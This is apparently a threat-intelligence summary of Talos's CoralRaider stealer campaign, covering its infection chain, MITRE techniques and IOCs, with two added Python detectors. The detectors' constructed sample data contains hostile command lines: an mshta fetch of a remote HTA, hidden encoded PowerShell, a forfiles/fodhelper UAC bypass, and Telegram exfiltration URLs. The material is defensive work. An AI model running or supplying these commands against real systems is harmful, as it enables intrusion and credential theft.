Key points
- Cisco Talos attributes the CoralRaider actor to Vietnam and links activity to PDB paths, Telegram bot artifacts, and an actor IP in Hanoi.
- Initial access is achieved via malicious Windows shortcut (.lnk) files that download and execute an HTA, which runs obfuscated VBScript that spawns in-memory PowerShell scripts.
- RotBot (a QuasarRAT variant) is deployed disguised as spoolsv.exe; it performs evasion and reconnaissance, downloads a configuration from a legitimate host, and uses Telegram bots for C2.
- XClient stealer is loaded in memory by RotBot and collects browser data, stored credentials, credit card/payment info, and social media/business ad account details (Facebook, Instagram, TikTok, YouTube), plus screenshots.
- The campaign abuses LoLBins such as ForFiles.exe and FoDHelper.exe (UAC bypass), modifies proxy registry keys, creates mutexes, and performs anti‑VM/anti‑analysis checks to avoid detection.
- Exfiltration occurs via Telegram bot endpoints (/sendPhoto, /sendDocument) delivering PNG screenshots and ZIP archives containing stolen data; IOCs and ClamAV detections are published by Talos.
MITRE Techniques
- [T1204.002] User Execution: Malicious File – The campaign begins when a user opens a malicious Windows shortcut file (‘The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled download server.’)
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The HTA executes an embedded obfuscated Visual Basic script as part of the execution chain (‘The HTA file executes an embedded obfuscated Visual Basic script.’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – The Visual Basic script launches an in-memory PowerShell script that decrypts and runs additional scripts (‘The malicious Visual Basic script executes an embedded PowerShell script in the memory, which decrypts and sequentially executes three other PowerShell scripts’).
- [T1102] Web Service – The actor uses Telegram bots as the C2 channel and exfiltration mechanism (‘the actor uses a Telegram bot, as a C2, to exfiltrate the victim’s data’).
- [T1071.001] Application Layer Protocol: Web Protocols – RotBot connects to a host on a legitimate domain to download its configuration file for C2 parameters (‘RotBot then connects to a host on a legitimate domain… and downloads the configuration file for the RotBot to connect to the C2’).
- [T1041] Exfiltration Over C2 Channel – Collected screenshots and ZIP archives are sent to the attacker via Telegram endpoints (‘PNG and ZIP files are exfiltrated to the attacker’s Telegram bot C2’).
- [T1555.003] Credentials from Web Browsers – XClient extracts cookies, stored credentials, and financial info from multiple browser installations (‘It targets Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browser data files… steals cookies, stored credentials, and financial information’).
- [T1218] Signed Binary Proxy Execution (LoLBins) – The actor abuses Windows utilities such as ForFiles.exe and FoDHelper.exe to assist execution and UAC bypass (‘abusing … living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe’).
- [T1497.001] Virtualization/Sandbox Evasion – Both RotBot and XClient perform anti-VM and anti-analysis checks to evade detection (‘performs several detection evasion checks on the victim machine’ and ‘performs anti-VM and anti-virus software checks’).
- [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The campaign uses FoDHelper.exe and other mechanisms to bypass UAC and disable notifications (‘…bypass the User Access Controls, disables the Windows and application notifications on the victim’s machine’).
Indicators of Compromise
- [IP Address] probable actor/victim infrastructure – 118[.]71[.]64[.]18 (Hanoi), 139[.]99[.]23[.]9 (seen in PDB paths).
- [Shortcut filenames] delivery lures – manual.pdf.lnk, LoanDocs.lnk, and numerous other .lnk filenames such as your-award.pdf.lnk and Research.pdf.lnk.
- [Drive serial numbers] metadata from LNKs – A0B4-2B36, FA4C-C31D (additional serials: 94AA-CEFB, 46F7-AF3B).
- [PDB paths / developer artifacts] build and attribution evidence – examples from PDB strings: “D:ROTROTBuild rot Export2024Bot Export Chiến…spoolsv.pdb” and “D:ROTROTROT Ver 5.5SourceEncrypted…XClientbinDebugAI.pdb”.
- [Detection names / AV signatures] vendor labels – Lnk.Downloader.CoralRaider-10024620-0, Win.Trojan.RotBot-10024631-0, Win.Infostealer.XClient-10025106-2.
- [IOCs repository] published indicators – GitHub IOCs: https://github.com/Cisco-Talos/IOCs/tree/main/2024/04/ (contains hashes and additional indicators).
The technical infection chain begins with a crafted Windows shortcut (.lnk) that, when opened, downloads an HTA file from an attacker-controlled server. The HTA runs an obfuscated Visual Basic script which spawns an in-memory PowerShell payload; that PowerShell decrypts and executes further scripts that perform anti‑analysis/anti‑VM checks, bypass User Account Control, disable notifications, and retrieve and run the RotBot payload (a QuasarRAT variant) disguised as spoolsv.exe.
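The execution chain above (shortcut, HTA, in-memory PowerShell, LoLBin UAC bypass, RotBot masquerading as spoolsv.exe) maps cleanly onto parent-child relationships in process-creation telemetry. The following is an added detection example, not Talos' code; the event field names (pid, ppid, image, cmdline), the sample events and the host/URL values are constructed for this example. The rules assume Sysmon-style Event ID 1 records already parsed into dicts, and that a genuine print spooler always runs from C:\Windows\System32.

```python
"""Hunt for the CoralRaider-style execution chain in process-creation events.

Added example (not from the Talos write-up). Each event mimics a parsed
Sysmon Event ID 1 record: pid, ppid, image (full path), cmdline.
All sample events, hostnames and paths below are constructed.
"""
import ntpath
import re

# Constructed sample: one benign spooler, then a single infection chain that
# follows the write-up: explorer (.lnk) -> cmd -> mshta (HTA) -> powershell
# (encoded, in-memory) -> forfiles -> fodhelper -> cmd -> fake spoolsv.exe.
SAMPLE_EVENTS = [
    {"pid": 800, "ppid": 600, "image": r"C:\Windows\System32\spoolsv.exe",
     "cmdline": "spoolsv.exe"},
    {"pid": 4000, "ppid": 3000, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c start "" mshta http://download.example.test/manual.hta'},
    {"pid": 4200, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://download.example.test/manual.hta"},
    {"pid": 4300, "ppid": 4200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"pid": 4400, "ppid": 4300, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c fodhelper.exe"'},
    {"pid": 4500, "ppid": 4400, "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    {"pid": 4600, "ppid": 4500, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\victim\AppData\Roaming\spoolsv.exe"},
    {"pid": 4700, "ppid": 4600, "image": r"C:\Users\victim\AppData\Roaming\spoolsv.exe",
     "cmdline": "spoolsv.exe"},
]

# Assumption: the legitimate print spooler only ever runs from here.
SYSTEM32 = "c:\\windows\\system32\\"
ENCODED_PS = re.compile(r"(?i)(^|\s)-(e|enc|encodedcommand)\s")
FORFILES_EXEC = re.compile(r"(?i)/c\s")


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule_name, pid) tuples for events matching the chain rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # HTA handler spawning PowerShell: the VBScript-to-PowerShell hop.
        if name == "powershell.exe" and pname == "mshta.exe":
            findings.append(("hta_to_powershell", e["pid"]))
        # Encoded command line: script body never touches disk.
        if name == "powershell.exe" and ENCODED_PS.search(cmd):
            findings.append(("encoded_powershell", e["pid"]))
        # fodhelper.exe auto-elevates and normally has no children at all.
        if pname == "fodhelper.exe":
            findings.append(("fodhelper_child", e["pid"]))
        # forfiles /c runs an arbitrary command per matched file (proxy execution).
        if name == "forfiles.exe" and FORFILES_EXEC.search(cmd):
            findings.append(("forfiles_proxy_exec", e["pid"]))
        # A spoolsv.exe outside System32 is the RotBot masquerade the write-up describes.
        if name == "spoolsv.exe" and not e["image"].lower().startswith(SYSTEM32):
            findings.append(("spoolsv_masquerade", e["pid"]))
    return findings


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to the given pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:22s} pid={pid}  chain={' > '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Each rule alone fires on some legitimate activity (admins do use encoded PowerShell; forfiles /c appears in scripts), so the value is in the ancestry: a single tree that hits three or more of these rules, ending in a spoolsv.exe under a user profile, is what to alert on.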
Once executed, RotBot performs host reconnaissance and additional evasion checks, modifies system proxy settings in the registry, creates mutexes as infection markers, and reaches out to a legitimate domain to retrieve a configuration that contains Telegram bot parameters. RotBot then loads the XClient stealer module from its resources; XClient runs anti‑VM/AV checks, captures screenshots, extracts browser databases (cookies, stored credentials, payment details) from Chrome/Edge/Firefox/other browsers, and enumerates social media/business ad account data (Facebook, Instagram, TikTok, YouTube), plus Telegram and Discord application data.
XClient writes mapped results to local temporary text files, bundles artifacts (PNG screenshots and ZIP archives), and exfiltrates them to the attacker-controlled Telegram bot endpoints (e.g., /sendPhoto and /sendDocument). Investigators found multiple corroborating IOCs including actor IPs, PDB paths with Vietnamese folder names, distinct LNK filenames and drive serials, and ClamAV/AV detection names; Talos published IOCs and references for further technical indicators. Read more: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/
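Because exfiltration goes to Telegram bot endpoints, the network side of this activity is easy to describe: POST requests to api.telegram.org whose path is /bot<token>/sendPhoto or /bot<token>/sendDocument. The following is an added example, not Talos' code, that scans a constructed proxy log for those calls, redacts the bot token before it lands in a ticket, and totals bytes per client. The log format (timestamp, client, method, URL, status, bytes) and every token, host and byte count are constructed; the example assumes the proxy or endpoint agent records full URLs (a CONNECT-only log would show just the host).

```python
"""Flag Telegram bot exfiltration endpoints in proxy logs.

Added example (not from the Talos write-up). Log format and all values are
constructed: "<timestamp> <client_ip> <http_method> <url> <status> <bytes>".
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

TELEGRAM_HOST = "api.telegram.org"
# The two endpoints the write-up names for PNG screenshots and ZIP archives.
EXFIL_METHODS = {"sendphoto", "senddocument"}
# Bot API path shape: /bot<bot_id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")

# Constructed sample log (tokens are not real).
SAMPLE_LOG = """\
2024-04-01T10:00:01Z 10.0.0.5 GET https://www.example.test/index.html 200 1820
2024-04-01T10:00:07Z 10.0.0.5 POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal_abc/sendPhoto 200 310221
2024-04-01T10:00:09Z 10.0.0.5 POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal_abc/sendDocument 200 2411773
2024-04-01T10:01:15Z 10.0.0.7 POST https://api.telegram.org/bot987654321:AAOtherTokenNotReal_xyz/getUpdates 200 412
"""


def parse_line(line):
    """Split one constructed log line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, method, url, status, nbytes = parts
    return {"ts": ts, "client": client, "http_method": method,
            "url": url, "status": int(status), "bytes": int(nbytes)}


def redact_token(token):
    """Keep the numeric bot id (useful for pivoting), drop the secret."""
    bot_id, _, _secret = token.partition(":")
    return f"{bot_id}:***"


def find_telegram_bot_calls(text):
    """Return every Bot API call, tagged 'exfil' for sendPhoto/sendDocument."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["url"])
        if (url.hostname or "").lower() != TELEGRAM_HOST:
            continue
        m = BOT_PATH.match(url.path)
        if not m:
            continue
        api_method = m.group("method")
        findings.append({
            "ts": rec["ts"],
            "client": rec["client"],
            "token": redact_token(m.group("token")),
            "api_method": api_method,
            "bytes": rec["bytes"],
            "category": "exfil" if api_method.lower() in EXFIL_METHODS else "bot_api",
        })
    return findings


def summarize_exfil(findings):
    """Per-client count and byte total for exfil-category calls."""
    summary = defaultdict(lambda: {"count": 0, "bytes": 0})
    for f in findings:
        if f["category"] == "exfil":
            summary[f["client"]]["count"] += 1
            summary[f["client"]]["bytes"] += f["bytes"]
    return dict(summary)


if __name__ == "__main__":
    hits = find_telegram_bot_calls(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(summarize_exfil(hits))
```

Calls to other Bot API methods (getUpdates in the sample) are kept under a separate category: they are the C2 polling side of the same technique and are worth a lower-severity alert on hosts that have no business talking to Telegram, while the sendPhoto/sendDocument volume per client is the exfiltration signal.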